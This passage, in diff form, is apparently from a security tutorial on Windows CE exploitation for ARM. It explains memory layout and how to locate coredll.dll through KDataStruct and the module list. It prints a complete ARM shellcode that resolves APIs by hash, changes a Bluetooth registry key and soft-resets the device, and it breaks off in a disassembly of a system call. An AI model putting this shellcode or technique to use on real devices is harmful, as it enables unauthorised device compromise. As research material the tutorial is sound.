+mode requires ARM architecture v4 and above. All modes except User mode
+are referred to as privileged mode. Applications usually execute in User
+mode, but on Pocket PC all applications appear to run in kernel mode, and
+we'll talk about it late.
+
+ARM processors have 37 registers. The registers are arranged in partially
+overlapping banks. There is a different register bank for each processor
+mode. The banked registers give rapid context switching for dealing with
+processor exceptions and privileged operations. 
+
+In ARM architecture v3 and above, there are 30 general-purpose 32-bit
+registers, the program counter(pc) register, the Current Program Status
+Register(CPSR) and five Saved Program Status Registers(SPSRs). Fifteen
+general-purpose registers are visible at any one time, depending on the
+current processor mode. The visible general-purpose registers are from r0
+to r14.
+
+By convention, r13 is used as a stack pointer(sp) in ARM assembly language. 
+The C and C++ compilers always use r13 as the stack pointer.
+
+In User mode and System mode, r14 is used as a link register(lr) to store
+the return address when a subroutine call is made. It can also be used as
+a general-purpose register if the return address is stored in the stack.
+
+The program counter is accessed as r15(pc). It is incremented by four
+bytes for each instruction in ARM state, or by two bytes in Thumb state.
+Branch instructions load the destination address into the pc register.
+
+You can load the pc register directly using data operation instructions.
+This feature is different from other processors and it is useful while
+writing shellcode.
+
+
+--[ 4 - Windows CE Memory Management
+
+Understanding memory management is very important for buffer overflow
+exploit. The memory management of Windows CE is very different from other
+operating systems, even other Windows systems. 
+
+Windows CE uses ROM (read only memory) and RAM (random access memory).
+
+The ROM stores the entire operating system, as well as the applications
+that are bundled with the system. In this sense, the ROM in a Windows CE
+system is like a small read-only hard disk. The data in ROM can be
+maintained without power of battery. ROM-based DLL files can be designated
+as Execute in Place. XIP is a new feature of Windows CE.net. That is,
+they're executed directly from the ROM instead of being loaded into
+program RAM and then executed. It is a big advantage for embedded systems.
+The DLL code doesn't take up valuable program RAM and it doesn't have to
+be copied into RAM before it's launched. So it takes less time to start an
+application. DLL files that aren't in ROM but are contained in the object
+store or on a Flash memory storage card aren't executed in place; they're
+copied into the RAM and then executed.
+
+The RAM in a Windows CE system is divided into two areas: program memory
+and object store.
+
+The object store can be considered something like a permanent virtual RAM
+disk. Unlike the RAM disks on a PC, the object store maintains the files
+stored in it even if the system is turned off. This is the reason that
+Windows CE devices typically have a main battery and a backup battery.
+They provide power for the RAM to maintain the files in the object store.
+Even when the user hits the reset button, the Windows CE kernel starts up
+looking for a previously created object store in RAM and uses that store
+if it finds one.
+
+Another area of the RAM is used for the program memory. Program memory is
+used like the RAM in personal computers. It stores the heaps and stacks
+for the applications that are running. The boundary between the object
+store and the program RAM is adjustable. The user can move the dividing
+line between object store and program RAM using the System Control Panel
+applet.
+
+Windows CE is a 32-bit operating system, so it supports 4GB virtual
+address space. The layout is as following:
+
++----------------------------------------+ 0xFFFFFFFF
+|   |   |  Kernel Virtual Address:       |
+|   | 2 |  KPAGE Trap Area,              |
+|   | G |  KDataStruct, etc              |
+|   | B |  ...                           |
+|   |   |--------------------------------+ 0xF0000000
+| 4 | K |  Static Mapped Virtual Address |
+| G | E |  ...                           |
+| B | R |  ...                           |
+|   | N |--------------------------------+ 0xC4000000
+| V | E |  NK.EXE                        |
+| I | L |--------------------------------+ 0xC2000000
+| R |   |  ...                           |
+| T |   |  ...                           |
+| U |---|--------------------------------+ 0x80000000
+| A |   |  Memory Mapped Files           |
+| L | 2 |  ...                           |
+|   | G |--------------------------------+ 0x42000000
+| A | B |  Slot 32 Process 32            |
+| D |   |--------------------------------+ 0x40000000
+| D | U |  ...                           |
+| R | S |--------------------------------+ 0x08000000
+| E | E |  Slot 3  DEVICE.EXE            |
+| S | R |--------------------------------+ 0x06000000
+| S |   |  Slot 2  FILESYS.EXE           |
+|   |   |--------------------------------+ 0x04000000
+|   |   |  Slot 1  XIP DLLs              |
+|   |   |--------------------------------+ 0x02000000
+|   |   |  Slot 0  Current Process       |
++---+---+--------------------------------+ 0x00000000
+
+The upper 2GB is kernel space, used by the system for its own data. And
+the lower 2GB is user space. From 0x42000000 to below 0x80000000 memories
+are used for large memory allocations, such as memory-mapped files, object
+store is in here. From 0 to below 0x42000000 memories are divided into 33
+slots, each of which is 32MB.
+
+Slot 0 is very important; it's for the currently running process. The
+virtual address space layout is as following:
+
++---+------------------------------------+ 0x02000000
+|   |     DLL Virtual Memory Allocations |
+| S |   +--------------------------------|
+| L |   |  ROM DLLs:R/W Data             |
+| O |   |--------------------------------|
+| T |   |  RAM DLL+OverFlow ROM DLL:     |
+| 0 |   |  Code+Data                     |
+|   |   +--------------------------------|
+| C +------+-----------------------------|
+| U        |                  A          |
+| R        V                  |          |
+| R +-------------------------+----------|
+| E |  General Virtual Memory Allocations|
+| N |   +--------------------------------|
+| T |   |  Process VirtualAlloc() calls  |
+|   |   |--------------------------------|
+| P |   |       Thread Stack             |
+| R |   |--------------------------------|
+| O |   |       Process Heap             |
+| C |   |--------------------------------|
+| E |   |       Thread Stack             |
+| S |---+--------------------------------|
+| S |      Process Code and Data         |
+|   |------------------------------------+ 0x00010000
+|   |    Guard Section(64K)+UserKInfo    |
++---+------------------------------------+ 0x00000000
+
+First 64 KB reserved by the OS. The process' code and data are mapped from
+0x00010000, then followed by stacks and heaps. DLLs loaded into the top
+address. One of the new features of Windows CE.net is the expansion of an
+application's virtual address space from 32 MB, in earlier versions of
+Windows CE, to 64 MB, because the Slot 1 is used as XIP.
+
+
+--[ 5 - Windows CE Processes and Threads
+
+Windows CE treats processes in a different way from other Windows systems.
+Windows CE limits 32 processes being run at any one time. When the system
+starts, at least four processes are created: NK.EXE, which provides the
+kernel service, it's always in slot 97; FILESYS.EXE, which provides file
+system service, it's always in slot 2; DEVICE.EXE, which loads and
+maintains the device drivers for the system, it's in slot 3 normally; and
+GWES.EXE, which provides the GUI support, it's in slot 4 normally. The
+other processes are also started, such as EXPLORER.EXE.
+
+Shell is an interesting process because it's not even in the ROM.
+SHELL.EXE is the Windows CE side of CESH, the command line-based monitor.
+The only way to load it is by connecting the system to the PC debugging
+station so that the file can be automatically downloaded from the PC. When
+you use Platform Builder to debug the Windows CE system, the SHELL.EXE
+will be loaded into the slot after FILESYS.EXE.
+
+Threads under Windows CE are similar to threads under other Windows
+systems. Each process at least has a primary thread associated with it
+upon starting even if it never explicitly created one. And a process can
+create any number of additional threads, it's only limited by available
+memory.
+
+Each thread belongs to a particular process and shares the same memory
+space. But SetProcPermissions(-1) gives the current thread access to any
+process. Each thread has an ID, a private stack and a set of registers.
+The stack size of all threads created within a process is set by the
+linker when the application is compiled.
+
+The IDs of process and thread in Windows CE are the handles of the
+corresponding process and thread. It's funny, but it's useful while
+programming.
+
+When a process is loaded, system will assign the next available slot to it
+. DLLs loaded into the slot and then followed by the stack and default
+process heap. After this, then executed.
+
+When a process' thread is scheduled, system will copy from its slot into
+slot 0. It isn't a real copy operation; it seems just mapped into slot 0.
+This is mapped back to the original slot allocated to the process if the
+process becomes inactive. Kernel, file system, windowing system all runs
+in their own slots
+
+Processes allocate stack for each thread, the default size is 64KB,
+depending on link parameter when the program is compiled. The top 2KB is
+used to guard against stack overflow, we can't destroy this memory,
+otherwise, the system will freeze. And the remained available for use.
+
+Variables declared inside functions are allocated in the stack. Thread's
+stack memory is reclaimed when it terminates.
+
+
+--[ 6 - Windows CE API Address Search Technology
+
+We must have a shellcode to run under Windows CE before exploit. Windows
+CE implements as Win32 compatibility. Coredll provides the entry points
+for most APIs supported by Windows CE. So it is loaded by every process.
+The coredll.dll is just like the kernel32.dll and ntdll.dll of other Win32
+systems. We have to search necessary API addresses from the coredll.dll
+and then use these APIs to implement our shellcode. The traditional method
+to implement shellcode under other Win32 systems is to locate the base
+address of kernel32.dll via PEB structure and then search API addresses
+via PE header.
+
+Firstly, we have to locate the base address of the coredll.dll. Is there a
+structure like PEB under Windows CE? The answer is yes. KDataStruct is an
+important kernel structure that can be accessed from user mode using the
+fixed address PUserKData and it keeps important system data, such as
+module list, kernel heap, and API set pointer table (SystemAPISets).
+
+KDataStruct is defined in nkarm.h:
+
+// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h
+struct KDataStruct {
+    LPDWORD lpvTls;         /* 0x000 Current thread local storage pointer */
+    HANDLE  ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */
+    char    bResched;       /* 0x084 reschedule flag */
+    char    cNest;          /* 0x085 kernel exception nesting */
+    char    bPowerOff;      /* 0x086 TRUE during "power off" processing */
+    char    bProfileOn;     /* 0x087 TRUE if profiling enabled */
+    ulong   unused;         /* 0x088 unused */
+    ulong   rsvd2;          /* 0x08c was DiffMSec */
+    PPROCESS pCurPrc;       /* 0x090 ptr to current PROCESS struct */
+    PTHREAD pCurThd;        /* 0x094 ptr to current THREAD struct */
+    DWORD   dwKCRes;        /* 0x098  */
+    ulong   handleBase;     /* 0x09c handle table base address */
+    PSECTION aSections[64]; /* 0x0a0 section table for virutal memory */
+    LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */
+    LPVOID  alpvIntrData[SYSINTR_MAX_DEVICES];  /* 0x220 */
+    ulong   pAPIReturn;     /* 0x2a0 direct API return address for kernel mode */
+    uchar   *pMap;          /* 0x2a4 ptr to MemoryMap array */
+    DWORD   dwInDebugger;   /* 0x2a8 !0 when in debugger */
+    PTHREAD pCurFPUOwner;   /* 0x2ac current FPU owner */
+    PPROCESS pCpuASIDPrc;   /* 0x2b0 current ASID proc */
+    long    nMemForPT;      /* 0x2b4 - Memory used for PageTables */
+
+    long    alPad[18];      /* 0x2b8 - padding */
+    DWORD   aInfo[32];      /* 0x300 - misc. kernel info */
+    // WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h
+        #define KINX_PROCARRAY  0   /* 0x300 address of process array */
+        #define KINX_PAGESIZE   1   /* 0x304 system page size */
+        #define KINX_PFN_SHIFT  2   /* 0x308 shift for page # in PTE */
+        #define KINX_PFN_MASK   3   /* 0x30c mask for page # in PTE */
+        #define KINX_PAGEFREE   4   /* 0x310 # of free physical pages */
+        #define KINX_SYSPAGES   5   /* 0x314 # of pages used by kernel */
+        #define KINX_KHEAP      6   /* 0x318 ptr to kernel heap array */
+        #define KINX_SECTIONS   7   /* 0x31c ptr to SectionTable array */
+        #define KINX_MEMINFO    8   /* 0x320 ptr to system MemoryInfo struct */
+        #define KINX_MODULES    9   /* 0x324 ptr to module list */
+        #define KINX_DLL_LOW   10   /* 0x328 lower bound of DLL shared space */
+        #define KINX_NUMPAGES  11   /* 0x32c total # of RAM pages */
+        #define KINX_PTOC      12   /* 0x330 ptr to ROM table of contents */
+        #define KINX_KDATA_ADDR 13  /* 0x334 kernel mode version of KData */
+        #define KINX_GWESHEAPINFO 14 /* 0x338 Current amount of gwes heap in use */
+        #define KINX_TIMEZONEBIAS 15 /* 0x33c Fast timezone bias info */
+        #define KINX_PENDEVENTS 16  /* 0x340 bit mask for pending interrupt events */
+        #define KINX_KERNRESERVE 17 /* 0x344 number of kernel reserved pages */
+        #define KINX_API_MASK 18    /* 0x348 bit mask for registered api sets */
+        #define KINX_NLS_CP 19      /* 0x34c hiword OEM code page, loword ANSI code page */
+        #define KINX_NLS_SYSLOC 20  /* 0x350 Default System locale */
+        #define KINX_NLS_USERLOC 21 /* 0x354 Default User locale */
+        #define KINX_HEAP_WASTE 22  /* 0x358 Kernel heap wasted space */
+        #define KINX_DEBUGGER 23    /* 0x35c For use by debugger for protocol communication */
+        #define KINX_APISETS 24     /* 0x360 APIset pointers */
+        #define KINX_MINPAGEFREE 25 /* 0x364 water mark of the minimum number of free pages */
+        #define KINX_CELOGSTATUS 26 /* 0x368 CeLog status flags */
+        #define KINX_NKSECTION  27  /* 0x36c Address of NKSection */
+        #define KINX_PWR_EVTS   28  /* 0x370 Events to be set after power on */
+
+        #define KINX_NKSIG     31   /* 0x37c last entry of KINFO -- signature when NK is ready */
+        #define NKSIG          0x4E4B5347       /* signature "NKSG" */
+                            /* 0x380 - interlocked api code */
+                            /* 0x400 - end */
+};  /* KDataStruct */
+
+/* High memory layout
+ *
+ * This structure is mapped in at the end of the 4GB virtual
+ * address space.
+ *
+ *  0xFFFD0000 - first level page table (uncached) (2nd half is r/o)
+ *  0xFFFD4000 - disabled for protection
+ *  0xFFFE0000 - second level page tables (uncached)
+ *  0xFFFE4000 - disabled for protection
+ *  0xFFFF0000 - exception vectors
+ *  0xFFFF0400 - not used (r/o)
+ *  0xFFFF1000 - disabled for protection
+ *  0xFFFF2000 - r/o (physical overlaps with vectors)
+ *  0xFFFF2400 - Interrupt stack (1k)
+ *  0xFFFF2800 - r/o (physical overlaps with Abort stack & FIQ stack)
+ *  0xFFFF3000 - disabled for protection
+ *  0xFFFF4000 - r/o (physical memory overlaps with vectors & intr. stack & FIQ stack)
+ *  0xFFFF4900 - Abort stack (2k - 256 bytes)
+ *  0xFFFF5000 - disabled for protection
+ *  0xFFFF6000 - r/o (physical memory overlaps with vectors & intr. stack)
+ *  0xFFFF6800 - FIQ stack (256 bytes)
+ *  0xFFFF6900 - r/o (physical memory overlaps with Abort stack)
+ *  0xFFFF7000 - disabled
+ *  0xFFFFC000 - kernel stack
+ *  0xFFFFC800 - KDataStruct
+ *  0xFFFFCC00 - disabled for protection (2nd level page table for 0xFFF00000)
+ */
+
+
+The value of PUserKData is fixed as 0xFFFFC800 on the ARM processor, and
+0x00005800 on other CPUs. The last member of KDataStruct is aInfo. It
+offsets 0x300 from the start address of KDataStruct structure. Member
+aInfo is a DWORD array, there is a pointer to module list in index
+9(KINX_MODULES), and it's defined in pkfuncs.h. So offsets 0x324 from
+0xFFFFC800 is the pointer to the module list.
+
+Well, let's look at the Module structure. I marked the offsets of the
+Module structure as following:
+
+// WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h
+typedef struct Module {
+    LPVOID      lpSelf;                 /* 0x00 Self pointer for validation */
+    PMODULE     pMod;                   /* 0x04 Next module in chain */
+    LPWSTR      lpszModName;            /* 0x08 Module name */
+    DWORD       inuse;                  /* 0x0c Bit vector of use */
+    DWORD       calledfunc;             /* 0x10 Called entry but not exit */
+    WORD        refcnt[MAX_PROCESSES];  /* 0x14 Reference count per process*/
+    LPVOID      BasePtr;                /* 0x54 Base pointer of dll load (not 0 based) */
+    DWORD       DbgFlags;               /* 0x58 Debug flags */
+    LPDBGPARAM  ZonePtr;                /* 0x5c Debug zone pointer */
+    ulong       startip;                /* 0x60 0 based entrypoint */
+    openexe_t   oe;                     /* 0x64 Pointer to executable file handle */
+    e32_lite    e32;                    /* 0x74 E32 header */
+    // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
+      typedef struct e32_lite {           /* PE 32-bit .EXE header               */
+          unsigned short  e32_objcnt;     /* 0x74 Number of memory objects            */
+          BYTE            e32_cevermajor; /* 0x76 version of CE built for             */
+          BYTE            e32_ceverminor; /* 0x77 version of CE built for             */
+          unsigned long   e32_stackmax;   /* 0x78 Maximum stack size                  */
+          unsigned long   e32_vbase;      /* 0x7c Virtual base address of module      */
+          unsigned long   e32_vsize;      /* 0x80 Virtual size of the entire image    */
+          unsigned long e32_sect14rva;    /* 0x84 section 14 rva */
+          unsigned long e32_sect14size;   /* 0x88 section 14 size */
+          struct info e32_unit[LITE_EXTRA]; /* 0x8c  Array of extra info units     */
+            // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
+            struct info {                       /* Extra information header block      */
+                unsigned long   rva;            /* Virtual relative address of info    */
+                unsigned long   size;           /* Size of information block           */
+            }
+            // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
+            #define EXP             0           /* 0x8c Export table position          */
+            #define IMP             1           /* 0x94 Import table position          */
+            #define RES             2           /* 0x9c Resource table position        */
+            #define EXC             3           /* 0xa4 Exception table position       */
+            #define SEC             4           /* 0xac Security table position        */
+            #define FIX             5           /* 0xb4 Fixup table position           */
+
+            #define LITE_EXTRA      6           /* Only first 6 used by NK */  
+      } e32_lite, *LPe32_list;
+    o32_lite    *o32_ptr;               /* 0xbc  O32 chain ptr */
+    DWORD       dwNoNotify;             /* 0xc0  1 bit per process, set if notifications disabled */
+    WORD        wFlags;                 /* 0xc4 */
+    BYTE        bTrustLevel;            /* 0xc6 */
+    BYTE        bPadding;               /* 0xc7 */
+    PMODULE     pmodResource;           /* 0xc8 module that contains the resources */
+    DWORD       rwLow;                  /* 0xcc base address of RW section for ROM DLL */
+    DWORD       rwHigh;                 /* 0xd0 high address RW section for ROM DLL */
+    PGPOOL_Q    pgqueue;                /* 0xcc list of the page owned by the module */
+} Module;
+
+
+Module structure is defined in kernel.h. The third member of Module
+structure is lpszModName, which is the module name string pointer and it
+offsets 0x08 from the start of the Module structure. The Module name is
+unicode string. The second member of Module structure is pMod, which is an
+address that point to the next module in chain. So we can locate the
+coredll module by comparing the unicode string of its name.
+
+Offsets 0x74 from the start of Module structure has an e32 member and it
+is an e32_lite structure. Let's look at the e32_lite structure, which
+defined in pehdr.h. In the e32_lite structure, member e32_vbase will tell
+us the virtual base address of the module. It offsets 0x7c from the start
+of Module structure. We else noticed the member of e32_unit[LITE_EXTRA],
+it is an info structure array. LITE_EXTRA is defined to 6 in the head of
+pehdr.h, only the first 6 used by NK and the first is export table position.
+So offsets 0x8c from the start of Module structure is the virtual relative
+address of export table position of the module.
+
+From now on, we got the virtual base address of the coredll.dll and its
+virtual relative address of export table position.
+
+I wrote the following small program to list all modules of the system:
+
+; SetProcessorMode.s
+
+    AREA    |.text|, CODE, ARM
+
+    EXPORT    |SetProcessorMode|   
+|SetProcessorMode| PROC
+    mov     r1, lr     ; different modes use different lr - save it
+    msr     cpsr_c, r0 ; assign control bits of CPSR
+    mov     pc, r1     ; return
+
+    END
+
+// list.cpp
+/*
+...
+01F60000 coredll.dll
+*/
+
+#include "stdafx.h"
+
+extern "C" void __stdcall SetProcessorMode(DWORD pMode);
+
+int WINAPI WinMain( HINSTANCE hInstance,
+                    HINSTANCE hPrevInstance,
+                    LPTSTR    lpCmdLine,
+                    int       nCmdShow)
+{
+    FILE *fp;
+    unsigned int KDataStruct = 0xFFFFC800;
+    void *Modules     = NULL,
+         *BaseAddress = NULL,
+         *DllName     = NULL;
+    
+	// switch to user mode
+	//SetProcessorMode(0x10);
+
+    if ( (fp = fopen("\\modules.txt", "w")) == NULL )
+    {
+        return 1;
+    }
+
+    // aInfo[KINX_MODULES]
+    Modules = *( ( void ** )(KDataStruct + 0x324));
+
+    while (Modules) {
+        BaseAddress = *( ( void ** )( ( unsigned char * )Modules + 0x7c ) );
+        DllName     = *( ( void ** )( ( unsigned char * )Modules + 0x8 ) );
+
+        fprintf(fp, "%08X %ls\n", BaseAddress, DllName);
+
+        Modules = *( ( void ** )( ( unsigned char * )Modules + 0x4 ) );
+    }
+
+    fclose(fp);
+    return(EXIT_SUCCESS);
+}
+
+In my environment, the Module structure is 0x8F453128 which in the kernel
+space. Most of Pocket PC ROMs were builded with Enable Full Kernel Mode
+option, so all applications appear to run in kernel mode. The first 5 bits
+of the Psr register is 0x1F when debugging, that means the ARM processor
+runs in system mode. This value defined in nkarm.h:
+
+// ARM processor modes
+#define USER_MODE   0x10    // 0b10000
+#define FIQ_MODE    0x11    // 0b10001
+#define IRQ_MODE    0x12    // 0b10010
+#define SVC_MODE    0x13    // 0b10011
+#define ABORT_MODE  0x17    // 0b10111
+#define UNDEF_MODE  0x1b    // 0b11011
+#define SYSTEM_MODE 0x1f    // 0b11111
+
+I wrote a small function in assemble to switch processor mode because the
+EVC doesn't support inline assemble. The program won't get the value of
+BaseAddress and DllName when I switched the processor to user mode. It
+raised a access violate exception.
+
+I use this program to get the virtual base address of the coredll.dll is
+0x01F60000 without change processor mode. But this address is invalid when
+I use EVC debugger to look into and the valid data is start from
+0x01F61000. I think maybe Windows CE is for the purpose of save memory
+space or time, so it doesn't load the header of dll files.
+
+Because we've got the virtual base address of the coredll.dll and its
+virtual relative address of export table position, so through repeat
+compare the API name by IMAGE_EXPORT_DIRECTORY structure, we can get the
+API address. IMAGE_EXPORT_DIRECTORY structure is just like other Win32
+system's, which defined in winnt.h:
+
+// WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h
+typedef struct _IMAGE_EXPORT_DIRECTORY {
+    DWORD   Characteristics;        /* 0x00 */
+    DWORD   TimeDateStamp;          /* 0x04 */
+    WORD    MajorVersion;           /* 0x08 */
+    WORD    MinorVersion;           /* 0x0a */
+    DWORD   Name;                   /* 0x0c */
+    DWORD   Base;                   /* 0x10 */
+    DWORD   NumberOfFunctions;      /* 0x14 */
+    DWORD   NumberOfNames;          /* 0x18 */
+    DWORD   AddressOfFunctions;     // 0x1c RVA from base of image
+    DWORD   AddressOfNames;         // 0x20 RVA from base of image
+    DWORD   AddressOfNameOrdinals;  // 0x24 RVA from base of image
+} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
+
+
+--[ 7 - The Shellcode for Windows CE
+
+There are something to notice before writing shellcode for Windows CE.
+Windows CE uses r0-r3 as the first to fourth parameters of API, if the
+parameters of API larger than four that Windows CE will use stack to store
+the other parameters. So it will be careful to write shellcode, because
+the shellcode will stay in the stack. The test.asm is our shellcode:
+
+; Idea from WinCE4.Dust written by Ratter/29A
+;
+; API Address Search
+; san@xfocus.org
+;
+; armasm test.asm
+; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj  
+  
+    CODE32
+
+    EXPORT  WinMainCRTStartup
+
+    AREA    .text, CODE, ARM
+
+test_start
+
+; r11 - base pointer
+test_code_start   PROC
+    bl      get_export_section
+
+    mov     r2, #4          ; functions number
+    bl      find_func
+
+    sub     sp, sp, #0x89, 30 ; weird after buffer overflow
+
+    add     r0, sp, #8
+    str     r0, [sp]
+    mov     r3, #2
+    mov     r2, #0
+    adr     r1, key
+    mov     r0, #0xA, 2
+    mov     lr, pc
+    ldr     pc, [r8, #-12] ; RegOpenKeyExW
+
+    mov     r0, #1
+    str     r0, [sp, #0xC]
+    mov     r3, #4
+    str     r3, [sp, #4]
+    add     r1, sp, #0xC
+    str     r1, [sp]
+    ;mov     r2, #0
+    adr     r1, val
+    ldr     r0, [sp, #8]
+    mov     lr, pc
+    ldr     pc, [r8, #-8]  ; RegSetValueExW
+
+    ldr     r0, [sp, #8]
+    mov     lr, pc
+    ldr     pc, [r8, #-4]  ; RegCloseKey
+
+    adr     r0, sf
+    ldr     r0, [r0]
+    ;ldr     r0, =0x0101003c
+    mov     r1, #0
+    mov     r2, #0
+    mov     r3, #0
+    mov     lr, pc
+    ldr     pc, [r8, #-16] ; KernelIoControl
+   
+    ; basic wide string compare
+wstrcmp   PROC
+wstrcmp_iterate
+    ldrh    r2, [r0], #2
+    ldrh    r3, [r1], #2
+
+    cmp     r2, #0
+    cmpeq   r3, #0
+    moveq   pc, lr
+
+    cmp     r2, r3
+    beq     wstrcmp_iterate
+
+    mov     pc, lr
+    ENDP
+
+; output:
+;  r0 - coredll base addr
+;  r1 - export section addr
+get_export_section   PROC
+    mov     r11, lr
+    adr     r4, kd
+    ldr     r4, [r4]
+    ;ldr     r4, =0xffffc800     ; KDataStruct
+    ldr     r5, =0x324          ; aInfo[KINX_MODULES]
+
+    add     r5, r4, r5
+    ldr     r5, [r5]
+
+    ; r5 now points to first module
+
+    mov     r6, r5
+    mov     r7, #0
+
+iterate
+    ldr     r0, [r6, #8]        ; get dll name
+    adr     r1, coredll
+    bl      wstrcmp             ; compare with coredll.dll
+
+    ldreq   r7, [r6, #0x7c]     ; get dll base
+    ldreq   r8, [r6, #0x8c]     ; get export section rva
+
+    add     r9, r7, r8
+    beq     got_coredllbase     ; is it what we're looking for?
+
+    ldr     r6, [r6, #4]
+    cmp     r6, #0
+    cmpne   r6, r5
+    bne     iterate             ; nope, go on
+
+got_coredllbase
+    mov     r0, r7
+    add     r1, r8, r7          ; yep, we've got imagebase
+                                ; and export section pointer
+
+    mov     pc, r11
+    ENDP
+
+; r0 - coredll base addr
+; r1 - export section addr
+; r2 - function name addr
+find_func   PROC
+    adr     r8, fn
+find_func_loop
+    ldr     r4, [r1, #0x20]     ; AddressOfNames
+    add     r4, r4, r0
+
+    mov     r6, #0              ; counter
+   
+find_start
+    ldr     r7, [r4], #4
+    add     r7, r7, r0          ; function name pointer
+    ;mov     r8, r2             ; find function name
+
+    mov     r10, #0
+hash_loop
+    ldrb    r9, [r7], #1
+    cmp     r9, #0
+    beq     hash_end
+    add     r10, r9, r10, ROR #7           
+    b       hash_loop
+
+hash_end
+    ldr     r9, [r8]
+    cmp     r10, r9 ; compare the hash
+    addne   r6, r6, #1       
+    bne     find_start
+
+    ldr     r5, [r1, #0x24]     ; AddressOfNameOrdinals
+    add     r5, r5, r0
+    add     r6, r6, r6
+    ldrh    r9, [r5, r6]        ; Ordinals
+    ldr     r5, [r1, #0x1c]     ; AddressOfFunctions
+    add     r5, r5, r0
+    ldr     r9, [r5, r9, LSL #2]; function address rva
+    add     r9, r9, r0          ; function address
+
+    str     r9, [r8], #4
+    subs    r2, r2, #1
+    bne     find_func_loop
+
+    mov     pc, lr
+    ENDP
+
+kd  DCB     0x00, 0xc8, 0xff, 0xff ; 0xffffc800
+sf  DCB     0x3c, 0x00, 0x01, 0x01 ; 0x0101003c
+
+fn  DCB     0xe7, 0x9d, 0x3a, 0x28 ; KernelIoControl
+    DCB     0x51, 0xdf, 0xf7, 0x0b ; RegOpenKeyExW
+    DCB     0xc0, 0xfe, 0xc0, 0xd8 ; RegSetValueExW
+    DCB     0x83, 0x17, 0x51, 0x0e ; RegCloseKey
+
+key DCB    "S", 0x0, "O", 0x0, "F", 0x0, "T", 0x0, "W", 0x0, "A", 0x0, "R", 0x0, "E", 0x0
+    DCB    "\\", 0x0, "\\", 0x0, "W", 0x0, "i", 0x0, "d", 0x0, "c", 0x0, "o", 0x0, "m", 0x0
+    DCB    "m", 0x0, "\\", 0x0, "\\", 0x0, "B", 0x0, "t", 0x0, "C", 0x0, "o", 0x0, "n", 0x0
+    DCB    "f", 0x0, "i", 0x0, "g", 0x0, "\\", 0x0, "\\", 0x0, "G", 0x0, "e", 0x0, "n", 0x0
+    DCB    "e", 0x0, "r", 0x0, "a", 0x0, "l", 0x0, 0x0, 0x0, 0x0, 0x0
+
+val DCB    "S", 0x0, "t", 0x0, "a", 0x0, "c", 0x0, "k", 0x0, "M", 0x0, "o", 0x0, "d", 0x0
+    DCB    "e", 0x0, 0x0, 0x0
+
+coredll DCB    "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0
+        DCB    ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0
+
+    ALIGN   4
+
+    LTORG
+test_end
+
+WinMainCRTStartup PROC
+    b     test_code_start
+    ENDP
+
+    END
+
+This shellcode constructs with three parts. Firstly, it calls the
+get_export_section function to obtain the virtual base address of coredll
+and its virtual relative address of export table position. The r0 and r1
+stored them. Second, it calls the find_func function to obtain the API
+address through IMAGE_EXPORT_DIRECTORY structure and stores the API
+addresses to its own hash value address. The last part is the function
+implement of our shellcode, it changes the register key
+HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and then uses
+KernelIoControl to soft restart the system.
+
+Windows CE.NET provides BthGetMode and BthSetMode to get and set the
+bluetooth state. But HP IPAQs use the Widcomm stack which has its own API,
+so BthSetMode can't open the bluetooth for IPAQ. Well, there is another
+way to open bluetooth in IPAQs(My PDA is HP1940). Just changing
+HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and reset the PDA,
+the bluetooth will open after system restart. This method is not pretty,
+but it works.
+
+Well, let's look at the get_export_section function. Why I commented off
+"ldr r4, =0xffffc800" instruction? We must notice ARM assembly language's
+LDR pseudo-instruction. It can load a register with a 32-bit constant
+value or an address. The instruction "ldr r4, =0xffffc800" will be
+"ldr r4, [pc, #0x108]" in EVC debugger, and the r4 register depends on the
+program. So the r4 register won't get the 0xffffc800 value in shellcode,
+and the shellcode will fail. The instruction "ldr r5, =0x324" will be
+"mov r5, #0xC9, 30" in EVC debugger, its ok when the shellcode is executed
+. The simple solution is to write the large constant value among the
+shellcode, and then use the ADR pseudo-instruction to load the address of
+value to register and then read the memory to register.
+
+To save size, we can use hash technology to encode the API names. Each API
+name will be encoded into 4 bytes. The hash technology is come from LSD's
+Win32 Assembly Components.
+
+The compile method is as following:
+
+armasm test.asm
+link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj
+
+You must install the EVC environment first. After this, we can obtain the
+necessary opcodes from EVC debugger or IDAPro or hex editors.
+
+
+--[ 8 - System Call
+
+First, let's look at the implementation of an API in coredll.dll:
+
+.text:01F75040                 EXPORT PowerOffSystem
+.text:01F75040 PowerOffSystem                          ; CODE XREF: SetSystemPowerState+58p
+.text:01F75040                 STMFD   SP!, {R4,R5,LR}
+.text:01F75044                 LDR     R5, =0xFFFFC800
+.text:01F75048                 LDR     R4, =unk_1FC6760
+.text:01F7504C                 LDR     R0, [R5]        ; UTlsPtr
+.text:01F75050                 LDR     R1, [R0,#-0x14] ; KTHRDINFO
+.text:01F75054                 TST     R1, #1
+.text:01F75058                 LDRNE   R0, [R4]        ; 0x8004B138 ppfnMethods
+.text:01F7505C                 CMPNE   R0, #0
+.text:01F75060                 LDRNE   R1, [R0,#0x13C] ; 0x8006C92C SC_PowerOffSystem
+.text:01F75064                 LDREQ   R1, =0xF000FEC4 ; trap address of SC_PowerOffSystem
+.text:01F75068                 MOV     LR, PC
+.text:01F7506C                 MOV     PC, R1
+.text:01F75070                 LDR     R3, [R5]
+.text:01F75074                 LDR     R0, [R3,#-0x14]
+.text:01F75078                 TST     R0, #1
+.text:01F7507C                 LDRNE   R0, [R4]
+.text:01F75080                 CMPNE   R0, #0
+.text:01F75084                 LDRNE   R0, [R0,#0x25C] ; SC_KillThreadIfNeeded
+.text:01F75088                 MOVNE   LR, PC
